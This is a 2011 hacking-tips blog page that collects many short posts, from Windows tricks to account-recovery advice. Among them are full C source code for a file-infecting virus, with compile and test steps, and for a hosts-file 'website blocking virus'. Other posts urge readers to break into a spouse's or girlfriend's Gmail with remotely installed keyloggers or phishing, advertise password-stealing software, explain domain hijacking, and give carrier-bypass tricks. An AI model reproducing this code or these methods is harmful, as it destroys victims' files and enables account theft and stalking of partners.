Thursday, March 31, 2011

Command Prompt Hacks |How to hide partition

1.Select Start , then Run , in Run option type cmd. (or  start->All Programs->Accessories->Command Prompt)
2.In Command Prompt (cmd) type DISKPART


3. Then type LIST VOLUME, after this you will get an partition  overview, as shown below
Add caption
4. Type SELECT VOLUME (number) , press ENTER on keyboard, then type  REMOVE LETTER (letter )as shown below
5.After this disk partition will be hidden. How to return disk partition? Easy, just type ASSIGN LETTER (letter), as shown beloww
With Command Prompt (cmd) , you can manipulate  disk partition. Here is list of possibility:
[TABLE=2]

DNN (DotNetNuke) Hacking

DNN (DotNetNuke) Hacking
Hello Friends,
Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.

How to get your own Rapidshare Premium Account

How to get your own Rapidshare Premium Account
Hello Friends,
Everybody wants a personal Rapidshare premium account but not all can afford it. If you are one of those people who can’t afford it or don’t want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. But Rapidshare guys are very smart. They provide users with a feature of locking their account due to which you will need access to the email account of that victim to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.

Customize Google to Improve Search Results

Google is indisputedbly the best search engine out there on the Internet, however there are a few ways by which you can customize Google and make it even better. I have got 3 best free Firefox extensions using which you can customize Google by adding extra useful information to your search results andremove unwanted informationlike ads, spam and click tracking so as to improve the overall searching experience. The following are the 3 best extensions for Firefox using which you can improve the search results.

1. OptimizeGoogle:

Using OptimizeGoogle, you can get rid of text ads from Google search results, add links from about 10 other search engines, add position counter, product results and more. You can even filter your search results to see dead websites and remove click tracking so that you can search anonymously. Here is a list of some of the other useful features of this plugin.
1. Use Google suggest (get word suggestion while typing)
2. Add more security by using https wherever necessary
3. Filter spammy websites from search results page
4. Option to remove SideWiki
5. Add links to bookmark your favorite result
6. Add links to other news and product search sites
To install the plugin, just visit the OptimizeGoogle  page from your Firefox browser and click on the Download button. Once installed, you can enable or disable the customization options from the Tools -> OptimizeGoogle Options.
After you customize Google to improve the search results, how about adding a feature that provides a way to preview the website in the search results itself? Here is a miracle Firefox extension to this job for us.

2.  SearchPreview:

SearchPreview (formerly GooglePreview) will insert thumbnail view of the webpage into the Google search results page itself so that you can take the guess work out of clicking a link. Just install the plugin, reload Firefox and you will have the SearchPreview at work. You can install this plugin from the following link.
SearchPreview Download
OptimizeGoogle and SearchPreview have made our search results smarter and faster. Now how about safer? Well you have another Firefox plugin to make your search results safer as well. Here we go.

3. McAfee SiteAdvisor:

This is a free browser plugin that gives safety advice about websites on the search results page before you actually click on the links. After you install the SiteAdvisor plugin, you will see a small rating icon next to each search result which will alert you about suspecious/risky websites and help you find safer alternatives. These ratings are derived based on various tests conducted by McAfee.
Based on the quality of links, SiteAdvisor may display Green, Yellow, Red or Grey icon next to the search results. Green means that the link is completely safe, Yellow means that there is a minor risk, Red means a mojor risk and Grey means that the site is not yet rated. These results will guide you to Web safety.
SiteAdvisor works on both Internet Explorer and Firefox which you can download from the following link:
I hope you enjoy these 3 plugins which make your searching experience a lot more simpler and safer. Here is a snapshot of all the 3 plugins at work.http://gohackers4u.blogspot.com

10 Tips for a Total Online Security

the globe over the past few years, there has also been a rise in the amount of online scams and frauds. Today most of the Internet users are unaware of the most prevailing online threats which pose a real challenge for their safe Internet usage. As a result, Online Security has become a questionable factor for the most Internet users. However it is still possible to effectively combat online insecurity provided that the users are well aware of the common scams and frauds and know how to protect themselves. A study shows that over 91% of the Internet users are unaware of the online scams and are worried about their security. Well if you are one among those 91% then here is a list of 10 tips to ensure your total online security.


1. Always install a good antivirus software and keep it up-to-date. Also install a good anti-spyware to keep your PC away from spywares. 
2. Always visit known and trusted websites. If you are about to visit an unknown website, ensure that you do not click on suspectable links and banners.
3. Perform a virus scan on the files/email attachments that you download before executing them.
4. Regularly Update your operating system and browser software. For a better security it is recommended that you surf the Internet through the latest version of your browser program.
5. Never share your password (email, bank logins etc.) with any one for any reason. Choose a strong password (A blend of alphanumeric+special symbols) and change it regularly,http://gohackes4u.blogspot.com eg. every 3 months. Avoid using easy-to-guess passwords. (ex. pet’s name or kid’s name)
6. Always type the URL of the website in your browser’s address bar to enter the login pages. For ex. To login to your Gmail account type http://mail.google.com 
7. Before you enter your password on any login page, ensure that you see https instead of http. ex. https://mail.google.com instead of http://mail.google.com. HTTPS protocol implements SSL (Secure Sockets Layer) and provide better security than a normal HTTP. For more information on HTTPS and SSL see Know More About Secure Sockets Layer (SSL).
8. Beware of phishing emails! Do not respond to any email that request you to update your login details by clicking on a link in the body of the email. Such links can lead to Fake Login Pages (Spoofed Pages). For more information on phishing refer What is Phishing?. Also refer How to Protect an Email Account from being Hacked.
9. Always hit the logout button to close your login session rather than abruptly terminating the browser window. Also clear your web browser caches after every session to remove the temporary files stored in the memory and hard disk of your PC.
10. Avoid (Stop) using any public computers or computers in the Internet cafes to access any sensitive/confidential information. Also avoid such computers to login to your email/bank accounts. You cannot be sure if any spyware, keystroke-logger, password-sniffer and other malicious programs have not been installed on such a PC.
By following the above 10 tips your online security can be guaranteed upto 90%. I hope this will help my readers for keeping themselves safe from any of the online insecurities. Cheers

Tuesday, March 29, 2011

Aircel Free GPRS Trick 2011

Change your GPRS settings to
Home Page: 0.facebook.com.bypass-proxy.appspot.com/your site url
APN:           aircelwap
PROXY:      192.168.35.201
PORt:           8081


Try only at Low balance*

Monday, March 28, 2011

Mobile Codes


*#06# for checking the IMEI (International Mobile Equipment Identity).


*#7780# reset to factory settings.


*#67705646# This will clear the LCD display(operator logo).


*#0000# To view software version.


*#2820# Bluetooth device address.


*#746025625# Sim clock allowed status.




#pw+1234567890+1# Shows if sim have restrictions.



*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)


*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.


*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone 
receives less signal from network.


*#4720# - Half Rate Codec activation.


*#4720* - Half Rate Codec deactivation. The phone will automatically restart


If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \


*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.

Sunday, March 27, 2011

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.


Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

(Screenshot of Ethereal in Action)

(Yahoo IM Session being sniffed in Ethereal)
The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.

How to hack someone Facebook account

Facebook Hacking Software APR v.7.4.11 released !! You can use this hacking software to hack Facebook password. We call it Advanced Password Retriever (APR) because the hacking software can hack not only Facebook account but can help you to hack into someone's MySpace account password, also to hack any Email password. The whole hacking process takes only few minutes, just watch our video demo to see how fast the software can get the password for you.Kindle DX Wireless Reading Device, Free 3G, 3G Works Globally, Graphite, 9.7


Advanced Password Retriever (APR) - HACKING for STUDYING - H4S from GoHacking.net can help you to recover / hack any email passwords, hack Facebook passwords, hack MySpace password, hack Yahoo password, hack Hotmail password, hack Gmail password... The cost for the hacking software is varying from US $200 for the basic version to US $400 for the advanced version, based on the functions available.

The demo version that would help alleviate your fears regarding our products has been uploaded to GoHacking.net and you can download demo version for free here.

This software is legit for the educational purposes only and if you want to recover your hacked Facebook password or email account password, you can purchase the full hacking software.

To have more info about our services and hacking software, please refer FAQ Section.


If you have any inquiry, please contact us. We will be more than happy to assist you.
Xbox 360 12 Month Live Gold Card




Download Links


download here

free hacking software, free hacking softwares, hacking facebook passwords, software hack facebook, email hacking softwares, facebook pass hack trial edition, software hack yahoo, software hack yahoo passwords, software hacking facebook using Advanced Password Retriever - Hacking for Studying (H4S) at GoHacking.net

How to hack Facebook password? Crack Hotmail password? How to hack Yahoo password ? Or how to hack Gmail, hack MSN, hack AOL, hack MySpace password ? Or simply how to crack email passwords? We can help you! Our software solutions enable our customers to gain an informational advantage in cases as diverse as spousal infidelity, monitoring of adolescent internet activity and unfair competition among many other potential applications. You can use our software to recover your lost passwords.

facebook hacking software, free hacking software, hacking facebook passwords, email hacking software, free hacking softwares, hack facebook passwords, free facebook hacking software, facebook hack software, hack facebook, software hack facebook, free hack software, hacking facebook, hacking software for facebook, free hacking software for facebook, net hacking software, facebook hacking program, facebook hacker software

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include
#include
#include char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.


#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Domain Hijacking – How to Hijack a Domain


Domain hijackingIn this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. 
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (/, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain. 
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

How to Become a Hacker

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in a samilar situation, then this article will most likely guide you to reach your goal.
On a regular basis, I get a lot of emails where people ask me ”How to Become a Hacker”. In fact, this question is not an easy one to answer, since hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course the TIME. Everyone can become a hacker provided they learn it from the basics. So, if you wanna become a hacker, then all you need is a good source of knowledge that will guide you through various concepts of hacking from the basics.

What Skills do I Need to Become a Hacker?

In simple words, there is no magic to become a  Hacker. But like anything else that is worthwhile, it takes dedication and willingness to learn. It is most important to have a basic knowledge of topics such as operating system basics and it’s working, computer networks, computer security and of course programming. However, you need not be the expert in each or any of those topics mentioned. As you gain the basic knowledge of various branches of computer, you can choose any one as your favorite and advance in it. 

What is the Best Way to Become a Hacker?

As said earlier, the best way to become a hacker is to start from the basics. You will have to master the basics to build a strong foundation. And once this is done, you’ll be in a position to explore new ideas and start thinking like a Hacker.
There exists tons of books on the market that will teach you hacking, but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in the book. Also, most of them are not suitable for the beginners who doesn’t know anything about hacking.
Anyhow, I have found an excellent Book for the Beginners that will teach you hacking from the basics. This book is the first step to fulfil your dream of becoming a hacker. When I first read this book, I myself was surprised at how simple and easy it was laid out. I decided to introduce this book for all those enthusiasts as it can be the right source for the beginners who are interested to learn hacking from the basics. The good thing about this book is that, any one can understand the concepts presented here, without the need for any prior knowledge. This book is called
Become a Hacker
This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything in this book is presented in a simple and effective manner. It is a great source for the beginner who would like to become a hacker. This will install a Hacker’s Mindset on you.
The following skills are uncovered in this book
1. You will learn all the hacker underground tricks and learn to apply them in real world situations.
2. You will be put into a hacker mindset so that you will learn to think like a Hacker.
3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
4. You will acquire knowledge nonexistent to 99.9% of the people in the world!
5. This underground handbook may get you interested in pursuing a career as an Ethical Hacker.

How to Hack a Gmail Account

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages. As a result, sometimes it becomes inevitable for people to hack the email account of their spouse or girlfriend so as to reveal the secret. So, it’s no wonder why many people want to know “how to hack a Gmail account”.
In this post, I am going to tell you some of the Real and Working ways to hack a Gmail account. However, before that, I want to make you aware of the common myths and scams associated with email hacking.
1. There is no readymade software program that can hack Gmail with just a click of a button. So, stay away from those websites that are waiting to rip off your pockets by selling fake products.
2. Most of the email hacking services on the Internet claim to hack Gmail password for just a small fee of say $100. I have personally tested many of those services and all I can tell you that they are nothing more than a scam.
With my experience of over 8 years in the field of ethical hacking and security, I can tell you that there are only two ways to hack Gmail password. They are:
1. Keylogging
2. Phishing

Keylogging: Easiest Way to Hack Gmail

Keylogging is the easiest way to gain access to any email account. Keylogging involves the use of a small program/software called the keylogger (also called as a spy software). This keylogger, when installed on a given computer, will capture each and every keystroke typed on the keyboard including passwords. Keylogger operates in a complete stealth mode and thus remains undetected.
The use of keyloggers doesn’t demand any special knowledge. So, anyone with a basic knowledge of computer can install and use the keylogger. To hack the password, all you need to do is, just install it on the computer of the target user. Once the victim logs into his Gmail account from his/her computer, the login details (username & password) are captured and stored instantly. You can later access the stored logs to find out the password.

But what if you do not have physical access to the computer?
Well, you need not worry since I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the following keylogger as the best:
  • SniperSpy – for Windows (Tested)
  • SniperSpy – for Mac (Tested)
If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.
NOTE: For more details on how to install and use SniperSpy, read my post: How to use Keyloggers

Phishing: 

Phishing is a way to attempt to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a fake login page (or fake website) whose look and feel is almost identical to that of the legitimate websites like Gmail, Yahoo and Hotmail. When the users try to login from these fake pages and enter their passwords there, the login details are stolen away by the hacker.
However, creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers as they are the easiest the safest way.

How to Hack an Email using Hardware Keylogger

Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger. If you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer my previous post Hacking an email account. Here I’ll give a breif description about keyloggers.
A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.
Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.
So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.

Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.
Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the

What to Do When Your Email Account is Hacked?

How to Recover Hacked Email Accounts?

Email Hacked?It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

For Gmail:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
Gmail Password Reset Link
If you cannot find success from the Step-1 then proceed to Step-2.
Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like
1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link
Account Recovery Form

For Yahoo and Hotmail:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option. 
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected!

Saturday, March 26, 2011

Multi Google Talk Login without any software

       Just follow the simple steps Below:
1) Right click on the Google Talk shortcut.
2) click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex
5) Click on OK.
  I didn't have to do anything after this and clicking on the shortcut multiple times just gave me different Google talk window.


Alternative

To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

SURF ORKUT WHERE IT IS BLOCKED


              Here are some proxy website links using which you can browse not only orkut but many other sites. Proxy sites are the websites, that hide your web identity from other websites. Mainly Ip address is Hidden
 
www.mathtunnel.com
www.gravitywars.com
www.kproxy.com
www.calculatepie.com
www.anonymizer.com
 
Open the above sites and just type in www.orkut.com in companies or colleges where its blocked n enjoy.

ACCESS INTERNET THROUGH UR MS CALCULATOR

This trick will allow you to access internet through Calculator. Calculator can be used as a web browser.

1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a Document with a Question mark).

4. Select Go to URL-address.

5. Type your address into the available field, but remember to type http:// and not just www. (or equivalent).

Skip or bypass Rapidshare, Megaupload Waiting time

Yes, you are reading it correctly, its not a prank or joke, now you can easily avoid the waiting time or usually we say time limit when you download as a free user from the file sharing services such as rapidshare, megaupload, deposifiles, hotfile. Normally you have to wait for 20-60 minutes to download the second file after downloading the first one. They implement ways to invite users to purchase a premium service. But this way of limiting Free download limit and asking free users to wait for long time to start another download can be annoying one.

Bypass Download Limit  in rapidshare, hotfile, megauploadSkipscreen is an extensSafe Practices for Life Online: A Guide for Middle and High Schoolion to browser to by pass waiting time on download. Unfortunately it can only be used with Firefox browsers to avoid waiting time while downloading files from some popular File hosting services like:

* Rapidshare.com
* zShare.net
* MediaFire.com
* Megaupload.comOne-Click Hosting: Yousendit, Rapidshare, Megaupload, Box.net, Badongo, Mediafire, Sendspace, Tucan Manager, HugedriveA Practical Guide to Affiliate Marketing: Quick Reference for Affiliate Managers & MerchantsThe Bogleheads' Guide to Retirement Planning
* Sharebee.com
* Depositfiles.com
* Sendspace.com
* Divshare.com
* Linkbucks.com
* Uploaded.to
* Hotfiles.com
* 4shared.com
* Limelinx.com
* Link-Protector.com
Its use is very simple and does not require any configuration, just go to the addon page of the extension and install it, restart your browser and enter one of thesedownload sites and you will no longer have to wait.
Download Skip Screen Firefox Extention
Alternative Methods or Hacks to Beat Rapidshare Download Limits and Waiting Time
Method 1:  Using Java Script:
1. Goto the page you want to download
2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up boxPerfect Pitch: The Art of Selling Ideas and Winning New Business (Adweek Books)The Zombie Survival Guide: Recorded Attacks
6. Enter the captcha
7. Download Your File
Method 2:  Request a new IP address from your ISP server
Here’s how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following.
ENTER after each new line.
ipconfig /flushdnsHoward Shore Creating the Lord of the Rings Symphony
ipconfig /release
ipconfig /renew

exit
Note: This might only work for DSL/Modem Internet Connection, not for Cable Internet users

Hacking Windows SEND TO MENU


  How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE.

Multiple login in yahoo Without Using any Software

  Multiple login in yahoo Without Using any Software

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
 
1.   Go to Start ----> Run . Type regedit, then enter .

2.  Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo  --->pager---->Test

3.  On the right page , right-click and choose new Dword value .

4.  Rename it as Plural.

5.  Double click and assign a decimal value of 1.

Its done!!
